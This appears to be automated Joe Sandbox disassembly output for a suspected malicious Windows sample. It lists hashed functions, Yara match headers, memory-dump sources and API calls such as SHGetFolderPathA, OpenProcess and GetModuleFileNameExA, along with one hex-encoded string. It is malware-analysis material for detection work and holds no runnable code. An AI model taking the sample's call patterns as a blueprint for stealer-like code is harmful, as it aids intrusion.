                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ___addlocaleref__amsg_exit__mtinitlocknum
                          • String ID: KERNEL32.DLL$Xus$xts
                          • API String ID: 3105635775-3376021188
                          • Opcode ID: 0f8247b74cd3ed6ff7b31dd7e242d7af03a4b03e281112f02aa792e7463ffc42
                          • Instruction ID: d681c3e88081f6c8ae7f811e0ae55264787cab1e2032aca39b7a065570ec1338
                          • Opcode Fuzzy Hash: 0f8247b74cd3ed6ff7b31dd7e242d7af03a4b03e281112f02aa792e7463ffc42
                          • Instruction Fuzzy Hash: 4601C4B1445710DEE724AFB9E809709B7E0AF10324F20990DE0D6573E1CFB8AA04CB11
                          APIs
                          • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0071E544
                          • lstrcpy.KERNEL32(00000000,?), ref: 0071E573
                          • lstrcat.KERNEL32(?,00000000), ref: 0071E581
                          • lstrcat.KERNEL32(?,010DD508), ref: 0071E59C
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$FolderPathlstrcpy
                          • String ID:
                          • API String ID: 818526691-0
                          • Opcode ID: d074d3f1147c00e15b67d14b138e0e79b20bef0069269755bc5bd22ed9daf21e
                          • Instruction ID: 5ebf1cedc4d6931c054c7b9dd4c4ecb062e8abc43e3f841b9de5a71256ba2aa1
                          • Opcode Fuzzy Hash: d074d3f1147c00e15b67d14b138e0e79b20bef0069269755bc5bd22ed9daf21e
                          • Instruction Fuzzy Hash: 6451AAB6A10108EBC755EB58DC4AEEE73BDFB48300F444568BD0597281DE74AE858F90
                          APIs
                          Strings
                          • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 00721FDF, 00721FF5, 007220B7
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: strlen
                          • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                          • API String ID: 39653677-4138519520
                          • Opcode ID: 12b6d2b3c6aa04eff1e2c0f79324c204539706355def25435f33f8173a78bb18
                          • Instruction ID: cecc50c20f7dac21b250bfc0379f8b1f9112550bde1128013e96852b9d357d01
                          • Opcode Fuzzy Hash: 12b6d2b3c6aa04eff1e2c0f79324c204539706355def25435f33f8173a78bb18
                          • Instruction Fuzzy Hash: FA213A3551019AAED730EA35E4447EDF3A6EF80361F884056C8190B243E33EA91BD796
                          APIs
                          • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0071EBB4
                          • lstrcpy.KERNEL32(00000000,?), ref: 0071EBE3
                          • lstrcat.KERNEL32(?,00000000), ref: 0071EBF1
                          • lstrcat.KERNEL32(?,010DD9C0), ref: 0071EC0C
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$FolderPathlstrcpy
                          • String ID:
                          • API String ID: 818526691-0
                          • Opcode ID: fe650e70237d550f5b91e31f89df02b748b762707224bffab1b820c5a297b9ef
                          • Instruction ID: aefdb38d69719ad0b1b6d9b8505ed861ce9a7199a6b984ec727b3d82f7051524
                          • Opcode Fuzzy Hash: fe650e70237d550f5b91e31f89df02b748b762707224bffab1b820c5a297b9ef
                          • Instruction Fuzzy Hash: E9316AB2A14118DBCB25EB68DC49BED77F4AF48300F104564BA15A7291DE749E858F50
                          APIs
                          • OpenProcess.KERNEL32(00000410,00000000), ref: 00724492
                          • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 007244AD
                          • CloseHandle.KERNEL32(00000000), ref: 007244B4
                          • lstrcpy.KERNEL32(00000000,?), ref: 007244E7
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseFileHandleModuleNameOpenProcesslstrcpy
                          • String ID:
                          • API String ID: 4028989146-0
                          • Opcode ID: 2e9e19284c8eb03e9d55dcef556a846478441e78eeee8703160417e23643f757
                          • Instruction ID: 605a72c872fb6fe53d6ecbea7fbc1d2dc174195e6843ca3f8ade947fa57820f7
                          • Opcode Fuzzy Hash: 2e9e19284c8eb03e9d55dcef556a846478441e78eeee8703160417e23643f757
                          • Instruction Fuzzy Hash: A5F0FCB19156656BE720AB74AC4DBE676A8AF14304F000591FA45D7180DBF49C808F90
                          APIs
                          • __getptd.LIBCMT ref: 00728FDD
                            • Part of subcall function 007287FF: __amsg_exit.LIBCMT ref: 0072880F
                          • __getptd.LIBCMT ref: 00728FF4
                          • __amsg_exit.LIBCMT ref: 00729002
                          • __updatetlocinfoEx_nolock.LIBCMT ref: 00729026
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                          • String ID:
                          • API String ID: 300741435-0
                          • Opcode ID: 7439c361a03d2faea50708eda218e86b98ed3e05d0981de54c35aaf7658215b1
                          • Instruction ID: b090b04e97d099b353c3da38931cd07647ee86ffb42788464aa20004a8cce5b2
                          • Opcode Fuzzy Hash: 7439c361a03d2faea50708eda218e86b98ed3e05d0981de54c35aaf7658215b1
                          • Instruction Fuzzy Hash: A1F09672909634DBE7B4BB78790FB5D33A16F00721F284109F544662D2DF6D5900D65A
                          APIs
                          • lstrlen.KERNEL32(------,00705BEB), ref: 0072731B
                          • lstrcpy.KERNEL32(00000000), ref: 0072733F
                          • lstrcat.KERNEL32(?,------), ref: 00727349
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcatlstrcpylstrlen
                          • String ID: ------
                          • API String ID: 3050337572-882505780
                          • Opcode ID: b74e9c52cb7ae69f62fd6ca60ae990a8086b82866f416f81b13ec018b19e584e
                          • Instruction ID: 3af9f051ce660b77ca80ef2d01c5d2dc36be033fd738ea3f396e92b45378fbd3
                          • Opcode Fuzzy Hash: b74e9c52cb7ae69f62fd6ca60ae990a8086b82866f416f81b13ec018b19e584e
                          • Instruction Fuzzy Hash: 70F030745143129FCB289F35ED59927B6F9EF45700318881DA89AC3215E734D840DF10
                          APIs
                            • Part of subcall function 00701530: lstrcpy.KERNEL32(00000000,?), ref: 00701557
                            • Part of subcall function 00701530: lstrcpy.KERNEL32(00000000,?), ref: 00701579
                            • Part of subcall function 00701530: lstrcpy.KERNEL32(00000000,?), ref: 0070159B
                            • Part of subcall function 00701530: lstrcpy.KERNEL32(00000000,?), ref: 007015FF
                          • lstrcpy.KERNEL32(00000000,?), ref: 00713422
                          • lstrcpy.KERNEL32(00000000,?), ref: 0071344B
                          • lstrcpy.KERNEL32(00000000,?), ref: 00713471
                          • lstrcpy.KERNEL32(00000000,?), ref: 00713497
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy
                          • String ID:
                          • API String ID: 3722407311-0
                          • Opcode ID: b2e9185bb7df49abc2f927a6981547ad2b0d5cbc1ae356bbb073c37ec7bfc3a6
                          • Instruction ID: 4b18e99ec85deaa630c71194ab3754c21204b14cc3655e172ae8b7c292490bb5
                          • Opcode Fuzzy Hash: b2e9185bb7df49abc2f927a6981547ad2b0d5cbc1ae356bbb073c37ec7bfc3a6
                          • Instruction Fuzzy Hash: A9120D74A152018FDB18CF1DC598B65B7E5AF44718B19C0AEE8099B3E2D77AED82CF40
                          APIs
                          • std::_Xinvalid_argument.LIBCPMT ref: 00717C94
                          • std::_Xinvalid_argument.LIBCPMT ref: 00717CAF
                            • Part of subcall function 00717D40: std::_Xinvalid_argument.LIBCPMT ref: 00717D58
                            • Part of subcall function 00717D40: std::_Xinvalid_argument.LIBCPMT ref: 00717D76
                            • Part of subcall function 00717D40: std::_Xinvalid_argument.LIBCPMT ref: 00717D91
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Xinvalid_argumentstd::_
                          • String ID: string too long
                          • API String ID: 909987262-2556327735
                          • Opcode ID: 38fe5825f6af4ce50ebc2e5dbed8fd42d5a8128b5719180c15a179f3417d2bf9
                          • Instruction ID: 390951fc218a23c7585ab5df4975ed4daced1ad458725505b2b58a8a002b5676
                          • Opcode Fuzzy Hash: 38fe5825f6af4ce50ebc2e5dbed8fd42d5a8128b5719180c15a179f3417d2bf9
                          • Instruction Fuzzy Hash: 2331D6723086148BE7289D6CE8809AAF7FDEF91760B20462AF5428B6C1D7759DC1C3F5
                          APIs
                          • GetProcessHeap.KERNEL32(00000008,?), ref: 00706F74
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00706F7B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateProcess
                          • String ID: @
                          • API String ID: 1357844191-2766056989
                          • Opcode ID: 57d5e0e60d6efe778a446ee5619685627e431b8312b2307480ed6138cde7594f
                          • Instruction ID: faa81664190f45ad7697ba74436769c394316fdbeb7d5fe9eb03dfd2d654ca23
                          • Opcode Fuzzy Hash: 57d5e0e60d6efe778a446ee5619685627e431b8312b2307480ed6138cde7594f
                          • Instruction Fuzzy Hash: 11216DB1600602DBEB248B20DC94BB673E8EB41705F444A78E946CB684FBB9F955CB60
                          APIs
                          • lstrcpy.KERNEL32(00000000), ref: 007215A1
                          • lstrcpy.KERNEL32(00000000,?), ref: 007215D9
                          • lstrcpy.KERNEL32(00000000,?), ref: 00721611
                          • lstrcpy.KERNEL32(00000000,?), ref: 00721649
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy
                          • String ID:
                          • API String ID: 3722407311-0
                          • Opcode ID: 4cebc11132a0a03a85c82e4ac931a6bc33cace163cee1aabce06a4d286626a94
                          • Instruction ID: ec2aaf9490c68a64ea467f4f8553262d9bb426dadf03bc34506790fccd3e6e8a
                          • Opcode Fuzzy Hash: 4cebc11132a0a03a85c82e4ac931a6bc33cace163cee1aabce06a4d286626a94
                          • Instruction Fuzzy Hash: 872106B4611B02CFD734DF6AE898A17B7F4BF54700B444A1CA896D7A81DB38F851CBA0
                          APIs
                            • Part of subcall function 00701610: lstrcpy.KERNEL32(00000000), ref: 0070162D
                            • Part of subcall function 00701610: lstrcpy.KERNEL32(00000000,?), ref: 0070164F
                            • Part of subcall function 00701610: lstrcpy.KERNEL32(00000000,?), ref: 00701671
                            • Part of subcall function 00701610: lstrcpy.KERNEL32(00000000,?), ref: 00701693
                          • lstrcpy.KERNEL32(00000000,?), ref: 00701557
                          • lstrcpy.KERNEL32(00000000,?), ref: 00701579
                          • lstrcpy.KERNEL32(00000000,?), ref: 0070159B
                          • lstrcpy.KERNEL32(00000000,?), ref: 007015FF
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmp
